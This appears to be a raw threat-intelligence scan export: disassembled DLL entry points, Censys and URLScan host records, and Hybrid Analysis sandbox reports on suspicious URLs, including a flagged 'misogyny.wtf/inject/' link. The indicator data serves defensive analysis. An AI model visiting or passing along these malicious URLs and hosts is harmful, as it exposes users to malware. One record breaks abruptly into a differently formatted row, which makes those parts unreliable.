rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18012063d,call0x18012065c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x1801204e8,int3,int3,int3,movqword ptr [rsp + 0x20], rbx,pushrbp,movrbp, rsp,subrsp, 0x20,movrax, qword ptr [rip + 0x2d990],movabsrbx, 0x2b992ddfa232,cmprax, rbx,jne0x1801206f3,"\n "vcruntime140.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18000fe81,call0x18001028c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000fde8,int3,int3,int3,movqword ptr [rsp + 0x10], rbx,movqword ptr [rsp + 0x18], rsi,pushrdi,subrsp, 0x10,xoreax, eax,xorecx, ecx,cpuid,movr8d, ecx,xorr11d, r11d,movr10d, 
edx,"\n "libssl-1_1.dll" file has an entrypoint instructions - "jmp0x18006ed98,jmp0x180025930,jmp0x18002aed0,jmp0x180008dd0,jmp0x18004c0d0,jmp0x18006f794,jmp0x18005a4a0,jmp0x18001aa40,jmp0x18002f940,jmp0x180067300,jmp0x180033520,jmp0x1800232d0,jmp0x18003abd0,jmp0x18002bc40,jmp0x18004c7d0,jmp0x180054370,jmp0x18001c190,jmp0x18006f8a4,jmp0x18003cb10,jmp0x18002b090,"\n "_elementtree.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180007981,call0x180007b1c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000782c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0xc677],movrcx, rbx,callqword ptr [rip + 0xc666],callqword ptr [rip + 0xc6a8],movrcx, rax,"\n "_ghash_clmul.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001371,call0x18000150c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000121c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x2c87],movrcx, rbx,callqword ptr [rip + 0x2c76],callqword ptr [rip + 0x2c80],movrcx, rax,"\n "_raw_aesni.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001381,call0x18000151c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000122c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x3c87],movrcx, rbx,callqword ptr [rip + 0x3c76],callqword ptr [rip + 0x3c80],movrcx, rax,"\n "_queue.pyd" file has an entrypoint instructions - "movqword ptr [rsp 
+ 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x1800014d1,call0x18000166c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000137c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x1b57],movrcx, rbx,callqword ptr [rip + 0x1b56],callqword ptr [rip + 0x1b40],movrcx, rax,"\n "_SHA1.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001381,call0x18000151c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000122c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x3c7f],movrcx, rbx,callqword ptr [rip + 0x3c6e],callqword ptr [rip + 0x3c78],movrcx, rax,"\n "select.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001511,call0x1800016ac,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x1800013bc,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x1b1f],movrcx, rbx,callqword ptr [rip + 0x1b1e],callqword ptr [rip + 0x1b08],movrcx, rax,"\n "_raw_ctr.pyd" file has an entrypoint instructions - "movqw
  Source Data: 34.149.204.188

2022-12-18 00:21:13 | HTTP Headers | Risky: No | Module: Censys | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data: {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b38adcf9fdbbd4-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]}
  Source Data: 188.114.97.0

2022-12-18 00:22:14 | Open TCP Port Banner | Risky: No | Module: Censys | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data:
    HTTP/1.1 403 Forbidden
    Date:
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Vary: Accept-Encoding
    Server: cloudflare
    CF-RAY: 77aa1c8a4ee62aa2-ORD
    Content-Encoding: gzip
  Source Data: 172.67.169.215

2022-12-18 00:04:12 | Co-Hosted Site | Risky: No | Module: SSL Certificate Analyzer | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data: sni.cloudflaressl.com
  Source Data: 188.114.97.1

2022-12-18 00:25:13 | Physical Location | Risky: No | Module: MetaDefender | Children/Correlations/Distance/Starred: 0/0/1/0 | Annotation: None
  Data: Amsterdam, Netherlands
  Source Data: 20.224.2.213

2022-12-18 00:20:42 | Physical Location | Risky: No | Module: LeakIX | Children/Correlations/Distance/Starred: 0/0/3/0 | Annotation: None
  Data: Italy
  Source Data: 81.88.48.102

2022-12-18 00:21:37 | Open TCP Port | Risky: No | Module: Censys | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data: 20.226.83.185:5050
  Source Data: 20.226.83.185

2022-12-18 00:10:03 | Linked URL - Internal | Risky: No | Module: URLScan.io | Children/Correlations/Distance/Starred: 1/0/1/0 | Annotation: None
  Data: https://plague.fun/
  Source Data: plague.fun

2022-12-18 00:04:01 | Physical Location | Risky: No | Module: ipstack | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data: United States
  Source Data: 172.67.190.129

2022-12-18 00:06:03 | Affiliate - Domain Name | Risky: No | Module: DNS Resolver | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data: registrar-servers.com
  Source Data: eforward4.registrar-servers.com

2022-12-18 00:04:32 | Raw Data from RIRs | Risky: No | Module: Hybrid Analysis | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data (Python repr of the Hybrid Analysis report, as stored by the module):
    [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 87, u'compromised_hosts': [u'199.34.228.53', u'199.34.228.53', u'192.0.77.2', u'172.67.143.74', u'172.67.143.74', u'85.199.67.19', u'192.0.72.16'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://crimsonpost286.weebly.com/', u'signatures': [
    {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://crimsonpost286.weebly.com/" (UID: 00000000-00003424)\n Spawned process "iexplore.exe" with commandline "SCODEF:3424 CREDAT:275457 /prefetch:2" (UID: 00000000-00002572)'},
    {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://crimsonpost286.weebly.com/" (UID: 00000000-00003424)\n Spawned process "iexplore.exe" with commandline "SCODEF:3424 CREDAT:275457 /prefetch:2" (UID: 00000000-00002572)'},
    {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "logotype_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarC115.tmp" as clean (type is "data")'},
    {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d60_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d60_IESQMMUTEX_0_331"\n "IsoScope_d60_IESQMMUTEX_0_303"\n "IsoScope_d60_IESQMMUTEX_0_519"\n "IsoScope_d60_ConnHashTable<3424>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3424"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d60_IE_EarlyTabStart_0xa00_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'},
    {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"199.34.228.53:80"\n "199.34.228.53:443"\n "216.58.195.74:443"\n "151.101.1.46:443"\n "172.217.6.42:443"\n "192.0.77.2:80"\n "37.72.175.4:80"\n "68.142.107.88:80"\n "151.101.2.152:443"\n "104.21.44.44:443"\n "172.67.143.74:80"\n "216.58.194.182:443"\n "172.67.143.74:443"\n "85.199.67.19:80"\n "138.201.16.247:80"\n "192.0.72.16:443"\n "192.154.111.219:443"\n "216.58.194.161:443"\n "104.18.20.186:80"\n "67.220.210.93:80"'},
    {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crimsonpost286.weebly.com"\n "i0.wp.com"\n "s1.dmcdn.net"\n "fernwoodneighbourhood.ca"\n "coolrom.com"\n "stroke.ahajournals.org"\n "www.pctipp.ch"\n "kwout.com"\n "forum.bmw5.co.uk"\n "ocsp.pki.goog"\n "r3.o.lencr.org"\n "cacerts.digicert.com"'},
    {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012',
u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "iexplore.exe" (UID: 00000000-00003424) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: 
"")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\63FEAE960BAA91E343CE2BD8B71798C76BDB77D0"; Key: "BLOB")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\07E032E020B72C3F192F0628A2593A19A70F069E"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\3E2BF7F2031B96F38CE6C4D8A85D3E2D58476A0F"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\4F65566336DB6598581D584A596C87934D5F2AB4"; Key: "BLOBLENGTH")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\F18B538D1BE903B6A6F056435B171589CAF36BF2"; Key: "BLOB")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\SMARTCARDROOT"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC0F5.tmp" has type "Microsoft Cabinet archive data 61157 bytes 1 file"\n "CabC1E1.tmp" has type "Microsoft Cabinet archive data 61157 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Hook Detection', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1056/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1056.004', u'relevance': 10, u'threat_level': 0, u'type': 11, u'description': u'"iexplore.exe" wrote bytes "c0bf986d" to virtual address "0x75A91F68" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "a035976d" to virtual address "0x75A9202C" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "80320801703208010032080160320801503208014032080130320801000000002cc9b975c021080100000000901708015023080100180801601f080120360801000000004036080100000000" to virtual address "0x01088000"\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x010870C0"\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x76EA14E0" (part of module "USER32.DLL")\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x757511B8" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "60d29a6d" to virtual address "0x757513B8" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x7733917C" (part of module "IERTUTIL.DLL")\n "iexplore.exe" wrote bytes "3030976d" to virtual address "0x6E5FFE90" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x74031250" (part of module "UXTHEME.DLL")\n "iexplore.exe" wrote bytes "60d29a6d" to virtual address "0x75A91D7C" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "a035976d" to virtual address "0x77121144" (part of module "LPK.DLL")\n "iexplore.exe" 104.21.28.240 2022-12-18 00:07:18 HTTP Headers No Web Spider 2 0 3 0 None {"content-length": "1554", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"612-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:18 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"} 
http://misogyny.wtf:2020/css/index.css 2022-12-18 00:04:10 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fe0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fe0_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n 
"Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fe0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4064"\n "IsoScope_fe0_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_fe0_ConnHashTable<4064>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fe0_IE_EarlyTabStart_0xd9c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "7XNUCQ2H.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n Dropped file: "335MX9XB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n Dropped file: "36YYHGU3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_9FF521F3-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6B533628-7574-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section 
info"- [targetUID: N/A]\n "7XNUCQ2H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "335MX9XB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004064]\n "~DF8FB903D113AF51F8.TMP" has type "data"- Location: [%TEMP%\\~DF8FB903D113AF51F8.TMP]- [targetUID: 00000000-00004064]\n "36YYHGU3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]\n "~DF6D539535B29E264B.TMP" has type "data"- Location: [%TEMP%\\~DF6D539535B29E264B.TMP]- [targetUID: 00000000-00004064]\n "RecoveryStore._9FF521F1-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF0CA44B466F93387E.TMP" has type "data"- Location: [%TEMP%\\~DF0CA44B466F93387E.TMP]- [targetUID: 00000000-00004064]\n 
"errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/inject/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, 
u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'638f5c1808fc134fee52854a', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'sha512': 